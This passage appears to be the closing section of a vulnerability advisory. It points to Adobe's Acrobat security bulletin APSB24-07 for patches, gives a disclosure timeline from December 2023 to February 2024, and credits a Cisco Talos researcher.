The vendor released a security bulletin at https://helpx.adobe.com/security/products/acrobat/apsb24-07.html; patches are linked from that page.

TIMELINE

2023-12-19 - Vendor Disclosure
2024-02-13 - Vendor Patch Release
2024-02-15 - Public Release

CREDIT

Discovered by KPC of Cisco Talos.